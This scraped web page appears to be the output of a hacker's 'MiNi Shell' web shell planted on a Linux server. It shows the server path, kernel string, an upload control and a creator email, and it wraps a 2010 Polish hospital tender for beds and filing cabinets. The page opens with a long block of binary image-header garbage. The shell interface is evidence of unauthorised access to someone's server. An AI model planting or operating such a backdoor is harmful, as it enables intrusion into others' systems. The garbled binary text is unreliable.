JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100225/52804-N-2010.html

<p class="kh_header"><b>Radom: Zakup i  dostawa sprzętu i aparatury medycznej dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 52804 - 2010; data zamieszczenia: 25.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i  dostawa sprzętu i aparatury medycznej dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. 	Przedmiotem zamówienia jest zakup i  dostawa sprzętu i aparatury medycznej dla potrzeb Placówek Radomskiego Szpitala Specjalistycznego według parametrów technicznych określonych poniżej:
Zakres nr 1 - Łóżko elektryczne Egerton - szt. 5
1.	Łóżko rehabilitacyjne wielofunkcyjne elektryczne - do ogólnej pielęgnacji z możliwością rehabilitacji.
2.	Konstrukcja nośna z profili stalowych pokrytych lakierem - segmenty leża wypełnione stalową kratą (dopuszcza się konstrukcję łóżka ramową umożliwiającą zamontowanie podwójnej ramy wyciagowej (rechabilitacyjnej).
3.	Ramy szczytów łóżek chromowane - (szczyty o wym. 40-50 cm).
4.	Barierki boczne chromowane - na całej dł. leża (lub pokrywajace 75% dł. leża) o wym. w granicach 37 -50 cm.
5.	Szerokość całkowita z odbojami 96 - 104 cm.
6.	Długość całkowita z odbojami 205 - 221 cm.
7.	Leże łóżka czterosegmentowe, w tym segmenty ruchome.
8.	Elektryczne regulacje - regulacja wysokości łóżka 45 - 80 cm lub 42 - 77,5 cm, lub 43 - 80,5 cm, regulacja segmentu oparcia pleców 70st.
9.	Pozycja Trendelenburga około 15st., pozycja anty - Trendelenburga minimum 5st. (dopuszcza się pozycję anty-Trendelenburga minimum do 12st.).
10.	Regulacja segmentu podudzia - ręczny mechanizm zapadkowy.
11.	Regulacja segmentu uda (dopuszcza się elektryczną regulację segmentu uda).
12.	Cztery koła jezdne z centralną dźwignią blokady kół. Jedno z kół posiada blokadę kierunkową umożliwiająca jazdę na wprost.
13.	Szczyty łóżka z możliwością łatwego wyjmowania z ramy leża wykonane z płyty laminowanej (mozliwość wyboru koloru szczytów).
14.	Rama łóżka posiadająca elementy zabezpieczające łóżko przed obiciem, tj. 4 krążki umieszczone na szczytach i 2 listwy odbojowe po bokach łóżka (dopuszcza się łóżko bez listew odbojowych).
15.	Funkcja CPR. tj. awaryjna mechaniczna możliwość uzyskania pozycji półpłaskiej(reanimacyjnej) oparcia pleców.
16.	Funkcja autoregresji segmentu oparcia pleców, która zapobiega przed zsuwaniem się pacjenta z łóżka.
17.	Pilot przewodowy sterujący z możliwością blokad funkcji leża (dopuszcza się łóżko posiadające przycisk natychmiastowego wyłączenia wszystkich funkcji elektrycznych).
18.	Zintegrowane przedłożenie leża do 20 cm wypełnione dodatkowym materacem.
19.	Dodatkowe wyposażenie do każdego łóżka: 
1) uchwyt do kroplówek przy szczycie łóżka (chromowany)
2) uchwyty na worek do cewnika po obu stronach
3) uchwyt do podwieszania  kabla elastycznego i uchwyt na pilot do obsługi elektrycznej łóżka
      (dopuszcza się rozwiązanie konstrukcyjne polegające na zintegrowaniu z pilotem
      przewodowym elastycznego uchwytu umożliwiającego powieszenie pilota na poręczach
       bocznych, ramach szczytów, ramie leża oraz innych elementach wyposażenia dodatkowego
       łóżka) 
   4) materac z pianki poliuretanowej o wysokiej gęstości około 100mm, w pokrowcu
       nieprzemakalnym, zmywalnym, paroprzepuszczalnym, przystosowanym do dezynfekcji,
   5) materac antyodleżynowy zmiennociśnieniowy, wysokość ok. 12 cm z systemem CRP
       (szybkiego wypuszczania powietrza)
   6) wyciągnik z uchwytem do ręki mocowany po obu stronach wezgłowia - 2 szt.
20.	 Gwarancja min. 24 miesiące.
21.	 Dopuszcza się maksymalne obciążenie robocze na poziomie 230 kg (parametr nie wymagany).
Zakres nr 2 - Łóżko szpitalne - szt. 15
1.	Łóżko szpitalne przeznaczone dla dorosłego pacjenta, na kołach jezdnych z centralną blokadą kół lub na kółkach z indywidualna blokadą jazdy i obrotu.
2.	Wymiary:
a)	szerokość łóżka: 965 - 1000 mm
b)	długość łóżka: 2100 - 2200 mm
c)	wysokość leża: 500+_5 mm
3.	Leże dwusegmentowe, wypełnione metalowa, odejmowana kratą lub siatką montowana na stałe.
4.	Sekcja oparcia pleców regulowana za pomocą przekładni ręcznej wspomaganej sprężyną gazową.
5.	Szczyty łóżka wykonane z rur niklowo-chromowych, wypełnione płytą z tworzywa wodoodporną, dwustronnie laminowana - w kolorze jasnoniebieskim.
6.	Zabezpieczenia przed uderzeniami w postaci krążków.
7.	Po obydwu stronach łóżka wieszaki do mocowania dodatkowego wyposażenia. 
8.	Wyposażenie:
     a) po obu stronach łóżka poręcze boczne zamontowane na stałe z możliwością opuszczania 
         i podnoszenia,zabezpieczajace przed wypadnięciem pacjenta.
      b) wieszak kroplówki, wieszak na cewnik po obu stronach łóżka.
      c) materac - wysokość 10 cm, w pokrowcu z tkaniny nieprzemakalnej, paraprzepuszczalnej.
9. Gwarancja (min. 12 miesiące) 
Zakres nr 3 - Szafy kartoteczne - szt. 30:
1.	Szafy kartoteczne szt. 30
2.	Wymiary szuflad zewnętrzne:  szerokość 37 cm, wysokość - 20 cm, głębokość - 75 cm.
3.	Ilość szuflad w słupku - 7 szt.
4.	Kolor jasny popiel, do przechowywania kopert formatu B-5 w poziomie
5.	Szuflady na prowadnicach teleskopowych z blokadą zabezpieczającą przed wypadnięciem,
6.	Szafa wykonana z blachy malowanej farbami proszkowymi.
7.	Szafa ma posiadać blokadę pozwalającą na wysunięcie tylko jednej szuflady
8.	Całość zamykana na zamek centralny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9, 39.13.21.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w kwocie: 
1.	Zakres nr 1 - 1.400,00  zł /słownie: jeden tysiąc czterysta złotych/,
2.	Zakres nr 2 - 1.260,00 zł /słownie: jeden tysiąc dwieście sześćdziesiąt złotych/,
3.	Zakres nr 3 -    950,00 zł /słownie: dziewięćset pięćdziesiąt złotych/</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca popsiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał min 1 dostawę w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie.
Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia.Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia.Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej.Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód wniesienia wadium.
Parafowany wzór umowy.
Pełnomocnictwo jeżeli ofertę składa pelnomocnik.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
Sekcja Zamówień Publicznych i Funduszy Strukturalnych
26-610 Radom, ul. Lekarska 4, pok. nr 313..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
Sekcja Zamówień Publicznych i Funduszy Strukturalnych
26-610 Radom, ul. Lekarska 4, pok. nr 313..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres nr 1 - Łóżko elektryczne Egerton - szt. 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Łóżko rehabilitacyjne wielofunkcyjne elektryczne - do ogólnej pielęgnacji z możliwością rehabilitacji.
2.	Konstrukcja nośna z profili stalowych pokrytych lakierem - segmenty leża wypełnione stalową kratą (dopuszcza się konstrukcję łóżka ramową umożliwiającą zamontowanie podwójnej ramy wyciagowej (rechabilitacyjnej).
3.	Ramy szczytów łóżek chromowane - (szczyty o wym. 40-50 cm).
4.	Barierki boczne chromowane - na całej dł. leża (lub pokrywajace 75% dł. leża) o wym. w granicach 37 -50 cm.
5.	Szerokość całkowita z odbojami 96 - 104 cm.
6.	Długość całkowita z odbojami 205 - 221 cm.
7.	Leże łóżka czterosegmentowe, w tym segmenty ruchome.
8.	Elektryczne regulacje - regulacja wysokości łóżka 45 - 80 cm lub 42 - 77,5 cm, lub 43 - 80,5 cm, regulacja segmentu oparcia pleców 70st.
9.	Pozycja Trendelenburga około 15st., pozycja anty - Trendelenburga minimum 5 st. (dopuszcza się pozycję anty-Trendelenburga minimum do 12st.).
10.	Regulacja segmentu podudzia - ręczny mechanizm zapadkowy.
11.	Regulacja segmentu uda (dopuszcza się elektryczną regulację segmentu uda).
12.	Cztery koła jezdne z centralną dźwignią blokady kół. Jedno z kół posiada blokadę kierunkową umożliwiająca jazdę na wprost.
13.	Szczyty łóżka z możliwością łatwego wyjmowania z ramy leża wykonane z płyty laminowanej (mozliwość wyboru koloru szczytów).
14.	Rama łóżka posiadająca elementy zabezpieczające łóżko przed obiciem, tj. 4 krążki umieszczone na szczytach i 2 listwy odbojowe po bokach łóżka (dopuszcza się łóżko bez listew odbojowych).
15.	Funkcja CPR. tj. awaryjna mechaniczna możliwość uzyskania pozycji półpłaskiej(reanimacyjnej) oparcia pleców.
16.	Funkcja autoregresji segmentu oparcia pleców, która zapobiega przed zsuwaniem się pacjenta z łóżka.
17.	Pilot przewodowy sterujący z możliwością blokad funkcji leża (dopuszcza się łóżko posiadające przycisk natychmiastowego wyłączenia wszystkich funkcji elektrycznych).
18.	Zintegrowane przedłożenie leża do 20 cm wypełnione dodatkowym materacem.
19.	Dodatkowe wyposażenie do każdego łóżka: 
1) uchwyt do kroplówek przy szczycie łóżka (chromowany)
2) uchwyty na worek do cewnika po obu stronach
3) uchwyt do podwieszania  kabla elastycznego i uchwyt na pilot do obsługi elektrycznej łóżka
      (dopuszcza się rozwiązanie konstrukcyjne polegające na zintegrowaniu z pilotem
      przewodowym elastycznego uchwytu umożliwiającego powieszenie pilota na poręczach
       bocznych, ramach szczytów, ramie leża oraz innych elementach wyposażenia dodatkowego
       łóżka) 
   4) materac z pianki poliuretanowej o wysokiej gęstości około 100mm, w pokrowcu
       nieprzemakalnym, zmywalnym, paroprzepuszczalnym, przystosowanym do dezynfekcji,
   5) materac antyodleżynowy zmiennociśnieniowy, wysokość ok. 12 cm z systemem CRP
       (szybkiego wypuszczania powietrza)
   6) wyciągnik z uchwytem do ręki mocowany po obu stronach wezgłowia - 2 szt.
20.	 Gwarancja min. 24 miesiące.
21.	Dopuszcza się maksymalne obciążenie robocze na poziomie 230 kg (parametr nie wymagany)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres nr 2 - Łóżko szpitalne - szt. 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Łóżko szpitalne przeznaczone dla dorosłego pacjenta, na kołach jezdnych z centralną blokadą kół lub na kółkach z indywidualna blokadą jazdy i obrotu.
2.	Wymiary:
a)	szerokość łóżka: 965 - 1000 mm
b)	długość łóżka: 2100 - 2200 mm
c)	wysokość leża: 500+_5 mm
3.	Leże dwusegmentowe, wypełnione metalowa, odejmowana kratą lub siatką montowana na stałe.
4.	Sekcja oparcia pleców regulowana za pomocą przekładni ręcznej wspomaganej sprężyną gazową.
5.	Szczyty łóżka wykonane z rur niklowo-chromowych, wypełnione płytą z tworzywa wodoodporną, dwustronnie laminowana - w kolorze jasnoniebieskim.
6.	Zabezpieczenia przed uderzeniami w postaci krążków.
7.	Po obydwu stronach łóżka wieszaki do mocowania dodatkowego wyposażenia. 
8.	Wyposażenie:
     a) po obu stronach łóżka poręcze boczne zamontowane na stałe z możliwością opuszczania 
         i podnoszenia,zabezpieczajace przed wypadnięciem pacjenta.
      b) wieszak kroplówki, wieszak na cewnik po obu stronach łóżka.
      c) materac - wysokość 10 cm, w pokrowcu z tkaniny nieprzemakalnej, paraprzepuszczalnej.
9. Gwarancja (min. 12 miesiące).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakres nr 3 - Szafy kartoteczne - szt. 30:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szafy kartoteczne szt. 30.
2.	Wymiary szuflad zewnętrzne:  szerokość 37 cm, wysokość - 20 cm, głębokość - 75 cm.
3.	Ilość szuflad w słupku - 7 szt.
4.	Kolor jasny popiel, do przechowywania kopert formatu B-5 w poziomie.
5.	Szuflady na prowadnicach teleskopowych z blokadą zabezpieczającą przed wypadnięciem.
6.	Szafa wykonana z blachy malowanej farbami proszkowymi.
7.	Szafa ma posiadać blokadę pozwalającą na wysunięcie tylko jednej szuflady.
8.	Całość zamykana na zamek centralny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com